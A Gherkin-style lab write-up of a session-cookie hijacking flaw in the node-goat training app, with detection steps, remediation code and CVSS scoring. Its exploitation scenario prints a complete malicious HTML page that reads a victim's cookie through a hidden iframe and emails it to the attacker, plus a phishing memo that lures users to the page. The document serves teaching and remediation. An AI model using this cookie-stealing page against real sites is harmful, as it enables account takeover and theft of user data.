## Version 1.4.1
## language: en

Feature:
  TOE:
    node-goat
  Category:
    Session hijacking
  Location:
    http://localhost:4000/memos
  CWE:
    CWE-1004: Sensitive Cookie Without HttpOnly Flag
    https://cwe.mitre.org/data/definitions/1004.html
  Rule:
    REQ.029: Cookies with security attributes
    https://fluidattacks.com/web/rules/029/
  Goal:
    Get the session cookie
  Recommendation:
    Enable httpOnly for the cookie and make secure.

  Background:
  Hacker's software:
    | <Software name> |    <Version>    |
    | Windows         |       10        |
    | Chrome          |  80.0.3987.122  |
  TOE information:
    Given I am accessing the site http://localhost:4000
    And the server is running MongoDB version 2.1.18
    And Nodejs version 10.15.3

  Scenario: Normal use case
    Given I access to "http://localhost:4000/"
    And I login in with a new user
    When I'm redirect to dashboard
    And I can manage my account

  Scenario: Static detection
    Given The source code
    When I see the code in "server.js"
    Then I see that the cookie didn't have the attribute httpOnly
    And The cookie can be accessed with scripts
    When I see in the route "\node_modules\express-session\session\cookie.js"
    Then I search the cookie
    And I see that cookie don't have expiration time
    """
    var Cookie = module.exports = function Cookie(options) {
      this.path = '/';
      this.maxAge = null;
    """
    When The cookie have security attributes like session
    Then An attacker can get the session cookie of any user
    And The attacker can access to the user account
    And The cookie is vulnerable

  Scenario: Dynamic detection
    Given I am the dashboard tab
    When I try to use and script "alert(document.cookie)"
    Then I receive an alert with the cookie [evidence](img1)
    And I try the same thing in another tab
    When I get the same cookie
    Then I see the name of the cookie "connection.sid"
    And The cookie is vulnerable for session hijacking

  Scenario: Exploitation (cookie of any user)
    Given The cookie is vulnerable and can be obtained using scripts
    Given The user to attacks needs to be logged
    Given I have a malicious web to hijack the session cookie
    Given I need that the user go to my malicious web
    When I need to make a malicious web to hijack the cookie
    Then I make the next malicious web
    """
    <!doctype html>
    <html lang="en" ng-app>

    <head>
      <title>News</title>
    </head>

    <body onload="document.getElementById('form').submit();">
      <h1>Loading...</h1>
      <form id="form" method="POST" action="http://<proxy>/profile"
              target="iframeHidden">
      </form>
      <iframe onload="send()" id="frame" name="iframeHidden" style="width:0px;
              height:0px; border:0; border:none">
      </iframe>
      <script>
        function send() {
          emailjs.init("<email.js userId>");
          setTimeout(
            " var x = frames['iframeHidden'];

              var y = x.document.cookie.toString() +
                      '<div></div>' + '<strong>' + 'User attacked: ' +
                      x.document.getElementById('firstName').value +
                      ' ' + x.document.getElementById('lastName').value +
                      '</strong>';

              emailjs.send('<email.js service>', '<email.js template>',
                          {'reply_to':'','from_name':'Session Cookie',
                          'to_name':'Attacker','message_html':y}) ", 20
          );
          setTimeout("location.replace('https://www.marketwatch.com/')", 80);
        }
      </script>
    </body>

    </html>
    """
    And I use a proxy in the server to redirect and avoid Cross-Origin
    And I use emailjs to send the cookie to my email
    When I think the way to make that an user go to my web
    Then I register on the page with fake information
    And I login in the page with my credentials
    When I think I can use the memos tab to send a fake memo
    Then I go to memos tab and see that uses markdown
    And I can use markdown to make a fake memo
    Then I try make a fake memo to trick the user into entering my page
    Then I write the following memo with markdown
    """
    # See the most recent stocks news!!!!!

    ![stocks](<image link>)

    ## Click [here](<evil page link>) to see the news.
    """
    And I submit the form and see my fake memo
    When Any user click the link in memos he loads my page
    Then The session cookie, the name and last name is hijack
    And The user don't notice that and is redirect to a news page
    When I login into my email
    Then I see a message with the subject "Session Cookie"
    And I see the session cookie from the user [evidence](img2)
    When I use that cookie to login without credentials
    Then I'm able to use the user account [evidence](img3)
    And The vulnerability was exploit

  Scenario: Remediation
    Given The source code
    When I go to the route "/server.js"
    Then I add some attributes to the cookie
    """
    app.use(session({
        secret: config.cookieSecret,
        // Both mandatory in Express v4
        saveUninitialized: true,
        resave: true,
        cookie: {
            maxAge: 600000,
            httpOnly: true,
            secure: true
        }
    }));
    """
    And The attribute "maxAge" adds a expiration of 10 minutes to the cookie
    And The attribute "httpOnly" avoid to get or modify the cookie with scripts
    And The attribute "secure" do the next thing
    """
    secure attribute only send the cookie to the server if the
    request use SSL and the HTTPS protocol
    """
    When I see the protocol of the server
    """
    http.createServer(app).listen(config.port, function() {
      console.log("Express http server listening on port " + config.port);
    });
    """
    Then I change it to use HTTPS
    """
    var fs = require("fs");
    var https = require("https");
    var httpsOptions = {
      key: fs.readFileSync("./artifacts/cert/server.key"),
      cert: fs.readFileSync("./artifacts/cert/server.crt")
    };
    .........................................................................
    https.createServer(httpsOptions, app).listen(config.port,  function() {
        console.log("Express https server listening on port " + config.port);
    });
    """
    And I try the same attack again
    When Any user use my link and is redirect
    Then I receive an email without cookie [evidence](img4)
    And I fix the vulnerability

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.3/10 (Medium) - AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.0/10 (Medium) - E:H/RL:O/RC:C/CR:H
  Environmental: Unique and relevant attributes to a specific user environment
    7.4/10 (High) - MAV:N/MAC:L/MPR:L/MUI:R/MS:U/MC:H/MI:L/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-03-03
